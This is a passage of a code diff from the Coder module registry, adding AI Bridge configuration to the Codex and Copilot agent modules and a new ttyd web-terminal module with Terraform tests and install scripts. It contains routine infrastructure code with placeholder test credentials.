+    openai_api_key           = "test-key"
+    enable_state_persistence = false
+  }
+
+  assert {
+    condition     = var.enable_state_persistence == false
+    error_message = "enable_state_persistence should be false when explicitly disabled"
+  }
+}
+
+run "test_codex_with_aibridge" {
+  command = plan
+
+  variables {
+    agent_id        = "test-agent"
+    workdir         = "/home/coder"
+    enable_aibridge = true
+  }
+
+  assert {
+    condition     = var.enable_aibridge == true
+    error_message = "enable_aibridge should be set to true"
+  }
+}
+
+run "test_aibridge_disabled_with_api_key" {
+  command = plan
+
+  variables {
+    agent_id        = "test-agent"
+    workdir         = "/home/coder"
+    openai_api_key  = "test-key"
+    enable_aibridge = false
+  }
+
+  assert {
+    condition     = var.enable_aibridge == false
+    error_message = "enable_aibridge should be false"
+  }
+
+  assert {
+    condition     = coder_env.openai_api_key.value == "test-key"
+    error_message = "OpenAI API key should be set correctly"
+  }
+}
+
+run "test_custom_options" {
+  command = plan
+
+  variables {
+    agent_id             = "test-agent"
+    workdir              = "/home/coder/project"
+    openai_api_key       = "test-key"
+    order                = 5
+    group                = "ai-tools"
+    icon                 = "/icon/custom.svg"
+    web_app_display_name = "Custom Codex"
+    cli_app              = true
+    cli_app_display_name = "Codex Terminal"
+    subdomain            = true
+    report_tasks         = false
+    continue             = false
+    codex_model          = "gpt-4o"
+    codex_version        = "0.1.0"
+    agentapi_version     = "v0.12.0"
+  }
+
+  assert {
+    condition     = var.order == 5
+    error_message = "Order should be set to 5"
+  }
+
+  assert {
+    condition     = var.group == "ai-tools"
+    error_message = "Group should be set to 'ai-tools'"
+  }
+
+  assert {
+    condition     = var.icon == "/icon/custom.svg"
+    error_message = "Icon should be set to custom icon"
+  }
+
+  assert {
+    condition     = var.cli_app == true
+    error_message = "cli_app should be enabled"
+  }
+
+  assert {
+    condition     = var.subdomain == true
+    error_message = "subdomain should be enabled"
+  }
+
+  assert {
+    condition     = var.report_tasks == false
+    error_message = "report_tasks should be disabled"
+  }
+
+  assert {
+    condition     = var.continue == false
+    error_message = "continue should be disabled"
+  }
+
+  assert {
+    condition     = var.codex_model == "gpt-4o"
+    error_message = "codex_model should be set to 'gpt-4o'"
+  }
+}
+
+run "test_no_api_key_no_aibridge" {
+  command = plan
+
+  variables {
+    agent_id = "test-agent"
+    workdir  = "/home/coder"
+  }
+
+  assert {
+    condition     = var.openai_api_key == ""
+    error_message = "openai_api_key should be empty when not provided"
+  }
+
+  assert {
+    condition     = var.enable_aibridge == false
+    error_message = "enable_aibridge should default to false"
+  }
+}

registry/coder-labs/modules/codex/scripts/install.sh

@@ -13,17 +13,22 @@ set -o nounset
 ARG_BASE_CONFIG_TOML=$(echo -n "$ARG_BASE_CONFIG_TOML" | base64 -d)
 ARG_ADDITIONAL_MCP_SERVERS=$(echo -n "$ARG_ADDITIONAL_MCP_SERVERS" | base64 -d)
 ARG_CODEX_INSTRUCTION_PROMPT=$(echo -n "$ARG_CODEX_INSTRUCTION_PROMPT" | base64 -d)
+ARG_ENABLE_AIBRIDGE=${ARG_ENABLE_AIBRIDGE:-false}
+ARG_AIBRIDGE_CONFIG=$(echo -n "$ARG_AIBRIDGE_CONFIG" | base64 -d)
 
 echo "=== Codex Module Configuration ==="
 printf "Install Codex: %s\n" "$ARG_INSTALL"
 printf "Codex Version: %s\n" "$ARG_CODEX_VERSION"
 printf "App Slug: %s\n" "$ARG_CODER_MCP_APP_STATUS_SLUG"
+printf "Codex Model: %s\n" "${ARG_CODEX_MODEL:-"Default"}"
+printf "Latest Codex Model: %s\n" "${ARG_LATEST_CODEX_MODEL}"
 printf "Start Directory: %s\n" "$ARG_CODEX_START_DIRECTORY"
 printf "Has Base Config: %s\n" "$([ -n "$ARG_BASE_CONFIG_TOML" ] && echo "Yes" || echo "No")"
 printf "Has Additional MCP: %s\n" "$([ -n "$ARG_ADDITIONAL_MCP_SERVERS" ] && echo "Yes" || echo "No")"
 printf "Has System Prompt: %s\n" "$([ -n "$ARG_CODEX_INSTRUCTION_PROMPT" ] && echo "Yes" || echo "No")"
 printf "OpenAI API Key: %s\n" "$([ -n "$ARG_OPENAI_API_KEY" ] && echo "Provided" || echo "Not provided")"
 printf "Report Tasks: %s\n" "$ARG_REPORT_TASKS"
+printf "Enable Coder AI Bridge: %s\n" "$ARG_ENABLE_AIBRIDGE"
 echo "======================================"
 
 set +o nounset
@@ -87,15 +92,33 @@ function install_codex() {
 
 write_minimal_default_config() {
   local config_path="$1"
+
+  ARG_OPTIONAL_TOP_LEVEL_CONFIG=""
+
+  if [[ "${ARG_ENABLE_AIBRIDGE}" = "true" ]]; then
+    ARG_OPTIONAL_TOP_LEVEL_CONFIG='model_provider = "aibridge"'
+  fi
+
+  if [[ "${ARG_MODEL_REASONING_EFFORT}" != "" ]]; then
+    ARG_OPTIONAL_TOP_LEVEL_CONFIG+=$'\n'"model_reasoning_effort = \"${ARG_MODEL_REASONING_EFFORT}\""
+  fi
+
   cat << EOF > "$config_path"
 # Minimal Default Codex Configuration
 sandbox_mode = "workspace-write"
 approval_policy = "never"
 preferred_auth_method = "apikey"
+${ARG_OPTIONAL_TOP_LEVEL_CONFIG}
 
 [sandbox_workspace_write]
 network_access = true
 
+[notice.model_migrations]
+"${ARG_CODEX_MODEL}" = "${ARG_LATEST_CODEX_MODEL}"
+
+[projects."${ARG_CODEX_START_DIRECTORY}"]
+trust_level = "trusted"
+
 EOF
 }
 
@@ -127,6 +150,15 @@ EOF
   fi
 }
 
+append_aibridge_config_section() {
+  local config_path="$1"
+
+  if [ -n "$ARG_AIBRIDGE_CONFIG" ]; then
+    printf "Adding AI Bridge configuration\n"
+    echo -e "\n# AI Bridge Configuration\n$ARG_AIBRIDGE_CONFIG" >> "$config_path"
+  fi
+}
+
 function populate_config_toml() {
   CONFIG_PATH="$HOME/.codex/config.toml"
   mkdir -p "$(dirname "$CONFIG_PATH")"
@@ -140,6 +172,11 @@ function populate_config_toml() {
   fi
 
   append_mcp_servers_section "$CONFIG_PATH"
+
+  if [ "$ARG_ENABLE_AIBRIDGE" = "true" ]; then
+    printf "AI Bridge is enabled\n"
+    append_aibridge_config_section "$CONFIG_PATH"
+  fi
 }
 
 function add_instruction_prompt_if_exists() {
@@ -185,4 +222,7 @@ install_codex
 codex --version
 populate_config_toml
 add_instruction_prompt_if_exists
-add_auth_json
+
+if [ "$ARG_ENABLE_AIBRIDGE" = "false" ]; then
+  add_auth_json
+fi

registry/coder-labs/modules/codex/scripts/start.sh

@@ -18,6 +18,7 @@ printf "Version: %s\n" "$(codex --version)"
 set -o nounset
 ARG_CODEX_TASK_PROMPT=$(echo -n "$ARG_CODEX_TASK_PROMPT" | base64 -d)
 ARG_CONTINUE=${ARG_CONTINUE:-true}
+ARG_ENABLE_AIBRIDGE=${ARG_ENABLE_AIBRIDGE:-false}
 
 echo "=== Codex Launch Configuration ==="
 printf "OpenAI API Key: %s\n" "$([ -n "$ARG_OPENAI_API_KEY" ] && echo "Provided" || echo "Not provided")"
@@ -26,6 +27,7 @@ printf "Start Directory: %s\n" "$ARG_CODEX_START_DIRECTORY"
 printf "Has Task Prompt: %s\n" "$([ -n "$ARG_CODEX_TASK_PROMPT" ] && echo "Yes" || echo "No")"
 printf "Report Tasks: %s\n" "$ARG_REPORT_TASKS"
 printf "Continue Sessions: %s\n" "$ARG_CONTINUE"
+printf "Enable Coder AI Bridge: %s\n" "$ARG_ENABLE_AIBRIDGE"
 echo "======================================"
 set +o nounset
 
@@ -153,8 +155,8 @@ setup_workdir() {
 build_codex_args() {
   CODEX_ARGS=()
 
-  if [ -n "$ARG_CODEX_MODEL" ]; then
-    CODEX_ARGS+=("--model" "$ARG_CODEX_MODEL")
+  if [[ -n "${ARG_CODEX_MODEL}" ]]; then
+    CODEX_ARGS+=("--model" "${ARG_CODEX_MODEL}")
   fi
 
   if [ "$ARG_CONTINUE" = "true" ]; then
@@ -208,7 +210,16 @@ capture_session_id() {
 
 start_codex() {
   printf "Starting Codex with arguments: %s\n" "${CODEX_ARGS[*]}"
-  agentapi server --term-width 67 --term-height 1190 -- codex "${CODEX_ARGS[@]}" &
+  # AGENTAPI_BOUNDARY_PREFIX is set by the agentapi module's main.sh when
+  # enable_boundary=true. It points to a wrapper script that runs the command
+  # through coder boundary, sandboxing only the agent process.
+  if [ -n "${AGENTAPI_BOUNDARY_PREFIX:-}" ]; then
+    printf "Starting with coder boundary enabled\n"
+    agentapi server --type codex --term-width 67 --term-height 1190 -- \
+      "${AGENTAPI_BOUNDARY_PREFIX}" codex "${CODEX_ARGS[@]}" &
+  else
+    agentapi server --type codex --term-width 67 --term-height 1190 -- codex "${CODEX_ARGS[@]}" &
+  fi
   capture_session_id
 }
 

registry/coder-labs/modules/copilot/README.md

@@ -3,7 +3,7 @@ display_name: Copilot CLI
 description: GitHub Copilot CLI agent for AI-powered terminal assistance
 icon: ../../../../.icons/github.svg
 verified: false
-tags: [agent, copilot, ai, github, tasks]
+tags: [agent, copilot, ai, github, tasks, aibridge]
 ---
 
 # Copilot
@@ -13,7 +13,7 @@ Run [GitHub Copilot CLI](https://docs.github.com/copilot/concepts/agents/about-c
 ```tf
 module "copilot" {
   source   = "registry.coder.com/coder-labs/copilot/coder"
-  version  = "0.3.0"
+  version  = "0.4.0"
   agent_id = coder_agent.example.id
   workdir  = "/home/coder/projects"
 }
@@ -51,7 +51,7 @@ data "coder_parameter" "ai_prompt" {
 
 module "copilot" {
   source   = "registry.coder.com/coder-labs/copilot/coder"
-  version  = "0.3.0"
+  version  = "0.4.0"
   agent_id = coder_agent.example.id
   workdir  = "/home/coder/projects"
 
@@ -71,7 +71,7 @@ Customize tool permissions, MCP servers, and Copilot settings:
 ```tf
 module "copilot" {
   source   = "registry.coder.com/coder-labs/copilot/coder"
-  version  = "0.3.0"
+  version  = "0.4.0"
   agent_id = coder_agent.example.id
   workdir  = "/home/coder/projects"
 
@@ -142,7 +142,7 @@ variable "github_token" {
 
 module "copilot" {
   source       = "registry.coder.com/coder-labs/copilot/coder"
-  version      = "0.3.0"
+  version      = "0.4.0"
   agent_id     = coder_agent.example.id
   workdir      = "/home/coder/projects"
   github_token = var.github_token
@@ -156,7 +156,7 @@ Run Copilot as a command-line tool without task reporting or web interface. This
 ```tf
 module "copilot" {
   source       = "registry.coder.com/coder-labs/copilot/coder"
-  version      = "0.3.0"
+  version      = "0.4.0"
   agent_id     = coder_agent.example.id
   workdir      = "/home/coder"
   report_tasks = false
@@ -164,6 +164,39 @@ module "copilot" {
 }
 ```
 
+### Usage with AI Bridge Proxy
+
+[AI Bridge Proxy](https://coder.com/docs/ai-coder/ai-bridge/ai-bridge-proxy) routes Copilot traffic through [AI Bridge](https://coder.com/docs/ai-coder/ai-bridge) for centralized LLM management and governance.
+The proxy environment variables are scoped to the Copilot process only and do not affect other workspace traffic.
+
+```tf
+module "aibridge-proxy" {
+  source    = "registry.coder.com/coder/aibridge-proxy/coder"
+  version   = "1.0.0"
+  agent_id  = coder_agent.main.id
+  proxy_url = "https://aiproxy.example.com"
+}
+
+module "copilot" {
+  source                   = "registry.coder.com/coder-labs/copilot/coder"
+  version                  = "0.4.0"
+  agent_id                 = coder_agent.main.id
+  workdir                  = "/home/coder/projects"
+  enable_aibridge_proxy    = true
+  aibridge_proxy_auth_url  = module.aibridge-proxy.proxy_auth_url
+  aibridge_proxy_cert_path = module.aibridge-proxy.cert_path
+}
+```
+
+> [!NOTE]
+> AI Bridge Proxy is a Premium Coder feature that requires [AI Governance Add-On](https://coder.com/docs/ai-coder/ai-governance).
+> See the [AI Bridge Proxy setup guide](https://coder.com/docs/ai-coder/ai-bridge/ai-bridge-proxy/setup) for details on configuring the proxy on your Coder deployment.
+> GitHub authentication is still required for Copilot as the proxy authenticates with AI Bridge using the Coder session token, but does not replace GitHub authentication.
+
+> [!IMPORTANT]
+> When using AI Bridge Proxy, enable [startup coordination](https://coder.com/docs/admin/templates/startup-coordination) by setting `CODER_AGENT_SOCKET_SERVER_ENABLED=true` in the workspace container environment.
+> This ensures the Copilot module waits for the `aibridge-proxy` module to complete before starting. Without it, the Copilot start script may fail if the AI Bridge Proxy setup has not completed in time.
+
 ## Authentication
 
 The module supports multiple authentication methods (in priority order):

registry/coder-labs/modules/copilot/copilot.tftest.hcl

@@ -234,3 +234,116 @@ run "app_slug_is_consistent" {
     error_message = "module_dir_name should be '.copilot-module'"
   }
 }
+
+run "aibridge_proxy_defaults" {
+  command = plan
+
+  variables {
+    agent_id = "test-agent"
+    workdir  = "/home/coder"
+  }
+
+  assert {
+    condition     = var.enable_aibridge_proxy == false
+    error_message = "enable_aibridge_proxy should default to false"
+  }
+
+  assert {
+    condition     = var.aibridge_proxy_auth_url == null
+    error_message = "aibridge_proxy_auth_url should default to null"
+  }
+
+  assert {
+    condition     = var.aibridge_proxy_cert_path == null
+    error_message = "aibridge_proxy_cert_path should default to null"
+  }
+}
+
+run "aibridge_proxy_enabled" {
+  command = plan
+
+  variables {
+    agent_id                 = "test-agent-aibridge-proxy"
+    workdir                  = "/home/coder"
+    enable_aibridge_proxy    = true
+    aibridge_proxy_auth_url  = "https://coder:mock-token@aiproxy.example.com"
+    aibridge_proxy_cert_path = "/tmp/aibridge-proxy/ca-cert.pem"
+  }
+
+  assert {
+    condition     = var.enable_aibridge_proxy == true
+    error_message = "AI Bridge Proxy should be enabled"
+  }
+
+  assert {
+    condition     = var.aibridge_proxy_auth_url == "https://coder:mock-token@aiproxy.example.com"
+    error_message = "AI Bridge Proxy auth URL should match the input variable"
+  }
+
+  assert {
+    condition     = var.aibridge_proxy_cert_path == "/tmp/aibridge-proxy/ca-cert.pem"
+    error_message = "AI Bridge Proxy cert path should match the input variable"
+  }
+}
+
+run "aibridge_proxy_validation_missing_proxy_auth_url" {
+  command = plan
+
+  variables {
+    agent_id                 = "test-agent-validation"
+    workdir                  = "/home/coder"
+    enable_aibridge_proxy    = true
+    aibridge_proxy_auth_url  = ""
+    aibridge_proxy_cert_path = "/tmp/aibridge-proxy/ca-cert.pem"
+  }
+
+  expect_failures = [
+    var.enable_aibridge_proxy,
+  ]
+}
+
+run "aibridge_proxy_validation_missing_cert_path" {
+  command = plan
+
+  variables {
+    agent_id                 = "test-agent-validation"
+    workdir                  = "/home/coder"
+    enable_aibridge_proxy    = true
+    aibridge_proxy_auth_url  = "https://coder:mock-token@aiproxy.example.com"
+    aibridge_proxy_cert_path = ""
+  }
+
+  expect_failures = [
+    var.enable_aibridge_proxy,
+  ]
+}
+
+run "aibridge_proxy_with_copilot_config" {
+  command = plan
+
+  variables {
+    agent_id                 = "test-agent"
+    workdir                  = "/home/coder"
+    copilot_model            = "gpt-5"
+    github_token             = "ghp_test123"
+    allow_all_tools          = true
+    enable_aibridge_proxy    = true
+    aibridge_proxy_auth_url  = "https://coder:mock-token@aiproxy.example.com"
+    aibridge_proxy_cert_path = "/tmp/aibridge-proxy/ca-cert.pem"
+  }
+
+  assert {
+    condition     = var.enable_aibridge_proxy == true
+    error_message = "AI Bridge Proxy should be enabled"
+  }
+
+  assert {
+    condition     = length(resource.coder_env.github_token) == 1
+    error_message = "github_token environment variable should be set alongside proxy"
+  }
+
+  assert {
+    condition     = length(resource.coder_env.copilot_model) == 1
+    error_message = "copilot_model environment variable should be set alongside proxy"
+  }
+}

registry/coder-labs/modules/copilot/main.tf

@@ -1,5 +1,5 @@
 terraform {
-  required_version = ">= 1.0"
+  required_version = ">= 1.9"
   required_providers {
     coder = {
       source  = "coder/coder"
@@ -173,6 +173,35 @@ variable "post_install_script" {
   default     = null
 }
 
+variable "enable_aibridge_proxy" {
+  type        = bool
+  description = "Route Copilot traffic through AI Bridge Proxy. See https://coder.com/docs/ai-coder/ai-bridge/ai-bridge-proxy"
+  default     = false
+
+  validation {
+    condition     = !var.enable_aibridge_proxy || (var.aibridge_proxy_auth_url != null && length(var.aibridge_proxy_auth_url) > 0)
+    error_message = "aibridge_proxy_auth_url is required when enable_aibridge_proxy is true."
+  }
+
+  validation {
+    condition     = !var.enable_aibridge_proxy || (var.aibridge_proxy_cert_path != null && length(var.aibridge_proxy_cert_path) > 0)
+    error_message = "aibridge_proxy_cert_path is required when enable_aibridge_proxy is true."
+  }
+}
+
+variable "aibridge_proxy_auth_url" {
+  type        = string
+  description = "AI Bridge Proxy URL with authentication. Use the proxy_auth_url output from the aibridge-proxy module."
+  default     = null
+  sensitive   = true
+}
+
+variable "aibridge_proxy_cert_path" {
+  type        = string
+  description = "Path to the AI Bridge Proxy CA certificate. Use the cert_path output from the aibridge-proxy module."
+  default     = null
+}
+
 data "coder_workspace" "me" {}
 data "coder_workspace_owner" "me" {}
 
@@ -279,6 +308,9 @@ module "agentapi" {
     ARG_TRUSTED_DIRECTORIES='${join(",", var.trusted_directories)}' \
     ARG_EXTERNAL_AUTH_ID='${var.external_auth_id}' \
     ARG_RESUME_SESSION='${var.resume_session}' \
+    ARG_ENABLE_AIBRIDGE_PROXY='${var.enable_aibridge_proxy}' \
+    ARG_AIBRIDGE_PROXY_AUTH_URL='${var.aibridge_proxy_auth_url != null ? var.aibridge_proxy_auth_url : ""}' \
+    ARG_AIBRIDGE_PROXY_CERT_PATH='${var.aibridge_proxy_cert_path != null ? var.aibridge_proxy_cert_path : ""}' \
     /tmp/start.sh
   EOT
 

registry/coder-labs/modules/copilot/scripts/start.sh

@@ -22,6 +22,9 @@ ARG_DENY_TOOLS=${ARG_DENY_TOOLS:-}
 ARG_TRUSTED_DIRECTORIES=${ARG_TRUSTED_DIRECTORIES:-}
 ARG_EXTERNAL_AUTH_ID=${ARG_EXTERNAL_AUTH_ID:-github}
 ARG_RESUME_SESSION=${ARG_RESUME_SESSION:-true}
+ARG_ENABLE_AIBRIDGE_PROXY=${ARG_ENABLE_AIBRIDGE_PROXY:-false}
+ARG_AIBRIDGE_PROXY_AUTH_URL=${ARG_AIBRIDGE_PROXY_AUTH_URL:-}
+ARG_AIBRIDGE_PROXY_CERT_PATH=${ARG_AIBRIDGE_PROXY_CERT_PATH:-}
 
 validate_copilot_installation() {
   if ! command_exists copilot; then
@@ -118,6 +121,48 @@ setup_github_authentication() {
   return 0
 }
 
+setup_aibridge_proxy() {
+  if [ "$ARG_ENABLE_AIBRIDGE_PROXY" != "true" ]; then
+    return 0
+  fi
+
+  echo "Setting up AI Bridge Proxy..."
+
+  # Wait for the aibridge-proxy module to finish.
+  # Uses startup coordination to block until aibridge-proxy-setup signals completion.
+  if command -v coder > /dev/null 2>&1; then
+    coder exp sync want "copilot-aibridge" "aibridge-proxy-setup" > /dev/null 2>&1 || true
+    coder exp sync start "copilot-aibridge" > /dev/null 2>&1 || true
+    trap 'coder exp sync complete "copilot-aibridge" > /dev/null 2>&1 || true' EXIT
+  fi
+
+  if [ -z "$ARG_AIBRIDGE_PROXY_AUTH_URL" ]; then
+    echo "ERROR: AI Bridge Proxy is enabled but no proxy auth URL provided."
+    exit 1
+  fi
+
+  if [ -z "$ARG_AIBRIDGE_PROXY_CERT_PATH" ]; then
+    echo "ERROR: AI Bridge Proxy is enabled but no certificate path provided."
+    exit 1
+  fi
+
+  if [ ! -f "$ARG_AIBRIDGE_PROXY_CERT_PATH" ]; then
+    echo "ERROR: AI Bridge Proxy certificate not found at $ARG_AIBRIDGE_PROXY_CERT_PATH."
+    echo "  Ensure the aibridge-proxy module has successfully completed setup."
+    exit 1
+  fi
+
+  # Set proxy environment variables scoped to this process tree only.
+  # These are inherited by the agentapi/copilot process below,
+  # but do not affect other workspace processes, avoiding routing
+  # unnecessary traffic through the proxy.
+  export HTTPS_PROXY="$ARG_AIBRIDGE_PROXY_AUTH_URL"
+  export NODE_EXTRA_CA_CERTS="$ARG_AIBRIDGE_PROXY_CERT_PATH"
+
+  echo "✓ AI Bridge Proxy configured"
+  echo "  CA certificate: $ARG_AIBRIDGE_PROXY_CERT_PATH"
+}
+
 start_agentapi() {
   echo "Starting in directory: $ARG_WORKDIR"
   cd "$ARG_WORKDIR"
@@ -157,5 +202,6 @@ start_agentapi() {
 }
 
 setup_github_authentication
+setup_aibridge_proxy
 validate_copilot_installation
 start_agentapi

registry/coder-labs/modules/nextflow/README.md

@@ -10,8 +10,6 @@ tags: [nextflow, workflow, hpc, bioinformatics]
 
 A module that adds Nextflow to your Coder template.
 
-![Nextflow](../../.images/nextflow.png)
-
 ```tf
 module "nextflow" {
   count    = data.coder_workspace.me.start_count

registry/coder-labs/modules/ttyd/README.md

@@ -0,0 +1,57 @@
+---
+display_name: ttyd
+description: Share a terminal command over the web via a Coder app
+icon: ../../../../.icons/terminal.svg
+verified: true
+tags: [terminal, web, ttyd]
+---
+
+# ttyd
+
+Run any command and expose it as a web-based terminal via [ttyd](https://github.com/tsl0922/ttyd). Each connection spawns a new process for the configured command. The terminal is accessible as a Coder app in the workspace UI.
+
+```tf
+module "ttyd" {
+  count    = data.coder_workspace.me.start_count
+  source   = "registry.coder.com/coder-labs/ttyd/coder"
+  version  = "1.0.0"
+  agent_id = coder_agent.main.id
+  command  = "bash"
+}
+```
+
+## Examples
+
+### Custom command
+
+```tf
+module "ttyd" {
+  count        = data.coder_workspace.me.start_count
+  source       = "registry.coder.com/coder-labs/ttyd/coder"
+  version      = "1.0.0"
+  agent_id     = coder_agent.main.id
+  display_name = "Shared Terminal"
+  command      = "tmux new-session -A -s main"
+  share        = "authenticated"
+}
+```
+
+### Readonly with custom ttyd options
+
+```tf
+module "ttyd" {
+  count           = data.coder_workspace.me.start_count
+  source          = "registry.coder.com/coder-labs/ttyd/coder"
+  version         = "1.0.0"
+  agent_id        = coder_agent.main.id
+  command         = "tail -f /var/log/app.log"
+  writable        = false
+  additional_args = "-t fontSize=18"
+}
+```
+
+## Session Behavior
+
+By default, each browser tab that opens the ttyd app spawns a **new process** for the configured command. Closing the tab kills that process.
+
+To get a **persistent, shared session** that survives tab closes and allows multiple viewers, use tmux as the command (see example above). This requires tmux to be installed in the workspace image.

registry/coder-labs/modules/ttyd/main.test.ts

@@ -0,0 +1,112 @@
+import { describe, expect, it } from "bun:test";
+import {
+  executeScriptInContainer,
+  runTerraformApply,
+  runTerraformInit,
+  type scriptOutput,
+  testRequiredVariables,
+} from "~test";
+
+function testBaseLine(output: scriptOutput) {
+  expect(output.exitCode).toBe(0);
+
+  const stdout = output.stdout.join("\n");
+  expect(stdout).toContain("Installing ttyd");
+  expect(stdout).toContain("Installation complete!");
+  expect(stdout).toContain("Starting ttyd in background...");
+}
+
+describe("ttyd", async () => {
+  await runTerraformInit(import.meta.dir);
+
+  testRequiredVariables(import.meta.dir, {
+    agent_id: "foo",
+    command: "bash",
+  });
+
+  it("runs with bash", async () => {
+    const state = await runTerraformApply(import.meta.dir, {
+      agent_id: "foo",
+      command: "bash",
+    });
+
+    const output = await executeScriptInContainer(
+      state,
+      "alpine/curl",
+      "sh",
+      "apk add bash",
+    );
+
+    testBaseLine(output);
+  }, 30000);
+
+  it("runs with custom command", async () => {
+    const state = await runTerraformApply(import.meta.dir, {
+      agent_id: "foo",
+      command: "htop",
+    });
+
+    const output = await executeScriptInContainer(
+      state,
+      "alpine/curl",
+      "sh",
+      "apk add bash",
+    );
+
+    testBaseLine(output);
+    expect(output.stdout.join("\n")).toContain("htop");
+  }, 30000);
+
+  it("runs with writable=false", async () => {
+    const state = await runTerraformApply(import.meta.dir, {
+      agent_id: "foo",
+      command: "bash",
+      writable: "false",
+    });
+
+    const output = await executeScriptInContainer(
+      state,
+      "alpine/curl",
+      "sh",
+      "apk add bash",
+    );
+
+    testBaseLine(output);
+  }, 30000);
+
+  it("runs with subdomain=false", async () => {
+    const state = await runTerraformApply(import.meta.dir, {
+      agent_id: "foo",
+      command: "bash",
+      agent_name: "main",
+      subdomain: "false",
+    });
+
+    const output = await executeScriptInContainer(
+      state,
+      "alpine/curl",
+      "sh",
+      "apk add bash",
+    );
+
+    testBaseLine(output);
+  }, 30000);
+
+  it("runs with additional_args", async () => {
+    const state = await runTerraformApply(import.meta.dir, {
+      agent_id: "foo",
+      command: "bash",
+      additional_args: "-t fontSize=18",
+    });
+
+    const output = await executeScriptInContainer(
+      state,
+      "alpine/curl",
+      "sh",
+      "apk add bash",
+    );
+
+    testBaseLine(output);
+    expect(output.stdout.join("\n")).toContain("fontSize=18");
+  }, 30000);
+});

registry/coder-labs/modules/ttyd/main.tf

@@ -0,0 +1,165 @@
+terraform {
+  required_version = ">= 1.0"
+
+  required_providers {
+    coder = {
+      source  = "coder/coder"
+      version = ">= 2.5"
+    }
+  }
+}
+
+variable "agent_id" {
+  type        = string
+  description = "The ID of a Coder agent."
+}
+
+data "coder_workspace" "me" {}
+
+data "coder_workspace_owner" "me" {}
+
+variable "agent_name" {
+  type        = string
+  description = "The name of the coder_agent resource. (Only required if subdomain is false and the template uses multiple agents.)"
+  default     = null
+}
+
+variable "slug" {
+  type        = string
+  description = "The slug of the coder_app resource."
+  default     = "ttyd"
+}
+
+variable "display_name" {
+  type        = string
+  description = "The display name for the ttyd application."
+  default     = "Web Terminal"
+}
+
+variable "port" {
+  type        = number
+  description = "The port to run ttyd on."
+  default     = 7681
+}
+
+variable "command" {
+  type        = string
+  description = "The command for ttyd to run (e.g., bash, fish, htop)."
+}
+
+variable "writable" {
+  type        = bool
+  description = "Allow clients to write to the terminal."
+  default     = true
+}
+
+variable "max_clients" {
+  type        = number
+  description = "Maximum number of concurrent clients (0 for unlimited)."
+  default     = 0
+}
+
+variable "additional_args" {
+  type        = string
+  description = "Additional arguments to pass to ttyd."
+  default     = ""
+}
+
+variable "log_path" {
+  type        = string
+  description = "The path to log ttyd output to. Defaults to ~/.local/state/ttyd/ttyd.log (XDG-compliant)."
+  default     = ""
+}
+
+variable "ttyd_version" {
+  type        = string
+  description = "The version of ttyd to install."
+  default     = "1.7.7"
+}
+
+variable "share" {
+  type        = string
+  description = "Who can access the app: 'owner' (workspace owner only), 'authenticated' (logged-in users), or 'public' (anyone)."
+  default     = "owner"
+  validation {
+    condition     = var.share == "owner" || var.share == "authenticated" || var.share == "public"
+    error_message = "Incorrect value. Please set either 'owner', 'authenticated', or 'public'."
+  }
+}
+
+variable "subdomain" {
+  type        = bool
+  description = <<-EOT
+    Determines whether the app will be accessed via its own subdomain or whether it will be accessed via a path on Coder.
+    If wildcards have not been setup by the administrator then apps with "subdomain" set to true will not be accessible.
+  EOT
+  default     = true
+}
+
+variable "order" {
+  type        = number
+  description = "The order determines the position of app in the UI presentation. The lowest order is shown first and apps with equal order are sorted by name (ascending order)."
+  default     = null
+}
+
+variable "group" {
+  type        = string
+  description = "The name of a group that this app belongs to."
+  default     = null
+}
+
+variable "open_in" {
+  type        = string
+  description = <<-EOT
+    Determines where the app will be opened. Valid values are "tab" and "slim-window" (default).
+    "tab" opens in a new tab in the same browser window.
+    "slim-window" opens a new browser window without navigation controls.
+  EOT
+  default     = "slim-window"
+  validation {
+    condition     = contains(["tab", "slim-window"], var.open_in)
+    error_message = "The 'open_in' variable must be one of: 'tab', 'slim-window'."
+  }
+}
+
+resource "coder_script" "ttyd" {
+  agent_id     = var.agent_id
+  display_name = var.display_name
+  icon         = "/icon/terminal.svg"
+  script = templatefile("${path.module}/run.sh", {
+    PORT            = var.port,
+    COMMAND         = var.command,
+    WRITABLE        = var.writable,
+    MAX_CLIENTS     = var.max_clients,
+    ADDITIONAL_ARGS = var.additional_args,
+    LOG_PATH        = local.log_path,
+    VERSION         = var.ttyd_version,
+    BASE_PATH       = local.base_path,
+  })
+  run_on_start = true
+}
+
+resource "coder_app" "ttyd" {
+  count        = var.command != "" ? 1 : 0
+  agent_id     = var.agent_id
+  slug         = var.slug
+  display_name = var.display_name
+  url          = "http://localhost:${var.port}${local.base_path}/"
+  icon         = "/icon/terminal.svg"
+  subdomain    = var.subdomain
+  share        = var.share
+  order        = var.order
+  group        = var.group
+  open_in      = var.open_in
+
+  healthcheck {
+    url       = "http://localhost:${var.port}${local.base_path}/token"
+    interval  = 5
+    threshold = 6
+  }
+}
+
+locals {
+  base_path = var.subdomain ? "" : format("/@%s/%s%s/apps/%s", data.coder_workspace_owner.me.name, data.coder_workspace.me.name, var.agent_name != null ? ".${var.agent_name}" : "", var.slug)
+  log_path  = var.log_path != "" ? var.log_path : "~/.local/state/ttyd/ttyd.log"
+}

registry/coder-labs/modules/ttyd/run.sh

@@ -0,0 +1,87 @@
+#!/usr/bin/env bash
+
+set -euo pipefail
+
+BOLD='\033[[0;1m'
+
+if command -v ttyd &> /dev/null; then
+  printf "%sFound existing ttyd installation\n\n" "$${BOLD}"
+else
+  printf "%sInstalling ttyd %s\n\n" "$${BOLD}" "${VERSION}"
+
+  ARCH=$(uname -m)
+  # shellcheck disable=SC2195
+  case "$${ARCH}" in
+    x86_64) BINARY="ttyd.x86_64" ;;
+    aarch64) BINARY="ttyd.aarch64" ;;
+    armv7l) BINARY="ttyd.armhf" ;;
+    armv6l) BINARY="ttyd.arm" ;;
+    *)
+      echo "ERROR: Unsupported architecture: $${ARCH}" >&2
+      exit 1
+      ;;
+  esac
+
+  BIN_DIR="$${HOME}/.local/bin"
+  mkdir -p "$${BIN_DIR}"
+  export PATH="$${BIN_DIR}:$${PATH}"
+
+  TTYD_BIN="$${BIN_DIR}/ttyd"
+  LOCK_DIR="/tmp/ttyd-install.lock"
+
+  if [[ ! -f "$${TTYD_BIN}" ]]; then
+    if mkdir "$${LOCK_DIR}" 2> /dev/null; then
+      if [[ ! -f "$${TTYD_BIN}" ]]; then
+        DOWNLOAD_URL="https://github.com/tsl0922/ttyd/releases/download/${VERSION}/$${BINARY}"
+        printf "Downloading ttyd from %s\n" "$${DOWNLOAD_URL}"
+        curl -fsSL "$${DOWNLOAD_URL}" -o "$${TTYD_BIN}.tmp"
+        chmod +x "$${TTYD_BIN}.tmp"
